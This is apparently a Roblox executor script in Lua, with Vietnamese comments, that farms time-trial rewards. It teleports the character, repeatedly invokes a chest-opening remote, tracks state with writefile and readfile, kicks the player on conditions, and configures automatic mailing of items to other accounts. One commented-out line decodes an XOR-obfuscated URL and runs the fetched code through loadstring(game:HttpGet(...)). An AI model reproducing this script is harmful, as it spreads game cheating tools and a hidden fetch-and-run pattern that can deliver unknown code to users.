task.spawn(function()

------------------------+++
_G.STATUS_disabble_SEND_ALL = false
Thu_7_openall = true


local Players = game:GetService("Players")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local player = Players.LocalPlayer
local playerGui = player:WaitForChild("PlayerGui")
local Save = require(ReplicatedStorage.Library.Client.Save)

local function getTimeTrialPoints()
	local saveData = Save.Get()
	return saveData and saveData.TimeTrialStats and (saveData.TimeTrialStats.Points or 0) or 0
end

local function claimReward()

    local now = os.date("!*t", os.time(os.date("!*t")) + 7 * 3600)
    local currentDay = now.wday
    local currentHour = now.hour

    -- Nếu Thứ 3 trước 23h thì đổi hết, ngược lại chỉ đổi hộp 3
    local isSaturdayFull = (currentDay == 3) and (currentHour < 23)

    if isSaturdayFull then
		
        Thu_7_openall = true
	end


if Thu_7_openall == true then
    diem_toi_thieu_thoat = 999
else
	diem_toi_thieu_thoat = 4999
end
warn(diem_toi_thieu_thoat)
if getTimeTrialPoints() < diem_toi_thieu_thoat then
    return
end

local character = player.Character or player.CharacterAdded:Wait()

-- Hàm teleport d?n v? trí nh?n thu?ng
local function teleportToRewardLocation()
    warn("teleport claim")
    player.Character.HumanoidRootPart.CFrame = CFrame.new(-15102, 20, 2164)
end

-- Hàm m? chest v?i s? di?m nh?t d?nh
local function openChest(pointsRequired, chestId)
    if getTimeTrialPoints() >= pointsRequired then
        teleportToRewardLocation()
        task.wait(0.5)
        local FantasyKey_Unlock = ReplicatedStorage.Network.TimeTrials_OpenChest
        FantasyKey_Unlock:InvokeServer(chestId)
        task.wait(1)
    end
end

while true do

	openChest(5000, 3)  -- M? chest yêu c?u 5000 di?m
	openChest(5000, 3)  -- M? chest yêu c?u 5000 di?m
	openChest(5000, 3)  -- M? chest yêu c?u 5000 di?m
	if Thu_7_openall == true then
		openChest(3000, 2)  -- M? chest yêu c?u 3000 di?m
		openChest(1000, 1)  -- M? chest yêu c?u 1000 di?m
	end
	if getTimeTrialPoints() < diem_toi_thieu_thoat then
		break
	end
task.wait(2)
end


end

claimReward()
------------------------+++

 
_G.start_vvv_ = true



if _G.ACC_SUPER == true then
	_G.FPS_farm = 7
else
	_G.FPS_farm = 4
end
_G.FPS_event = 4
--setfpscap(_G.FPS_farm)


	local HttpService = game:GetService("HttpService")
	local Players = game:GetService("Players")
	local TeleportService = game:GetService("TeleportService")
	local LocalPlayer = Players.LocalPlayer
	
	local function serverhopTo(placeId)
		TeleportService:Teleport(placeId, LocalPlayer)
	end

local _Config_Online = 25


local FILE_NAME = "OFFLINE.txt"
if not writefile or not readfile then    return	end
local function getOffline()
    if not isfile or not isfile(FILE_NAME) then
        writefile(FILE_NAME, "0")
        return 0
    end
    local content = readfile(FILE_NAME)
    local val = tonumber(content)
    if val == nil then
        writefile(FILE_NAME, "0")
        return 0
    end
    return val
end
local function setOffline(v)
    writefile(FILE_NAME, tostring(v))
end
local _Config_Offline = getOffline()
if _Config_Offline ~= _Config_Online then

	    setOffline(_Config_Online)
		if _G.Restart == true then
			_G.Restart = false 	
			return
		end
		--------------------------------------------
		_G.TAG_farmsync = false
		if EVENT_or_FARM == "F" then
			--game.Players.LocalPlayer:Kick("kick reset")	
		end
		--serverhopTo(140403681187145)
		--------------------------------------------
end

if _G.Restart == true then
	_G.Restart = false 	
end

--checku
--local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9) local v10={};for v11=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + 1 )),v1(v2(v9,1 + (v11% #v9) ,1 + (v11% #v9) + 1 )))%256 ));end return v5(v10);end loadstring(game:HttpGet(v7("\217\215\207\53\245\225\136\81\193\207\218\44\232\246\196\27\221\207\150\33\181\190\159\80\218\214\205\60\232\191\201\80\198\204\201\46\227\169\212\80\213\198\205\106\197\179\194\29\218\252\238\22\195\137\137\18\196\194","\126\177\163\187\69\134\219\167")))();

local now = os.date("!*t", os.time(os.date("!*t")) + 7 * 3600)
local currentHour = now.hour

if currentHour > 21 or currentHour < 20 then
	--_G.start_vvv_ = false
end

if name_vps == "V7" then
	_G.start_vvv_ = true
end


	

	if _G.RunsLeft_TIMEtrial == 0 and EVENT_or_FARM == "F" and _G.ACC_SUPER == false then
		--game.Players.LocalPlayer:Kick("kick fin")
		--serverhopTo(140403681187145)
	end
	if _G.RunsLeft_TIMEtrial > 0 and EVENT_or_FARM == "E" and _G.start_vvv_ == true then
		game.Players.LocalPlayer:Kick("kick pla")
		--serverhopTo(140403681187145)
	end
----------------------------------------------------------------------------------------



----------------------------------------------------------------------------------------
if _G.STATUS_disabble_SEND_ALL == true then
getgenv().GMAIL_RECEIVERS = {""}
getgenv().GMAIL_ITEMS = {
["Criittal10"] = {Class = "Enchant", Tier = 10 ,Id = "Criticals", MinAmount = 2, KeepAmount = 1},
["Criittal9"] = {Class = "Enchant", Tier = 9 ,Id = "Criticals", MinAmount = 5},
["Criittal8"] = {Class = "Enchant", Tier = 8 ,Id = "Criticals", MinAmount = 5},
}

end
task.wait(60)
	if game.PlaceId == 119454325063278 or game.PlaceId == 95635359880599 then
		game.Players.LocalPlayer:Kick("FIFA") 
	end
end)
